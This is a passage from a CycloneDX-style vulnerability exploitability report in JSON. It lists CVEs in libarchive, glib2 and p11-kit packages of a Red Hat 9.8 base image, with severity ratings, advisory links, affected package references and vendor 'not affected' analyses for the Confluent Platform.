          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/p11-kit-trust@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/p11-kit@0.26.2-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-14164",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        415
      ],
      "description": "A double free issue has been identified in libarchive's RAR5 reader. During parsing of a specially crafted RAR5 archive, the filtered_buf pointer may remain stale after being freed during unpacking state reinitialization. Subsequent processing of another archive entry can trigger a second free of the same memory region, resulting in a double-free condition. Successful exploitation may cause applications using the vulnerable libarchive API to terminate unexpectedly, leading to a denial of service.",
      "recommendation": "Upgrade libarchive to version 3.5.3-11.el9_8",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-14164"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30333"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52674"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52675"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54769"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-14164"
        },
        {
          "url": "https://bugzilla.redhat.com/2493411"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493411"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-14164"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-52674.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:52675"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3069"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3071"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-14164.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-52675.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14164"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-14164"
        }
      ],
      "published": "2026-06-30T07:16:32+00:00",
      "updated": "2026-08-18T15:16:48+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-1484",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1484"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1484"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433259"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-quby27cpefwz.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3870"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1484"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1485",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1485"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1485"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1485"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-hui7k8rsmbsl.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1489",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1489"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1489"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1489"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-h6zf92f0298p.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
        }
      ],
      "published": "2026-01-27T15:15:57+00:00",
      "updated": "2026-06-17T10:15:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
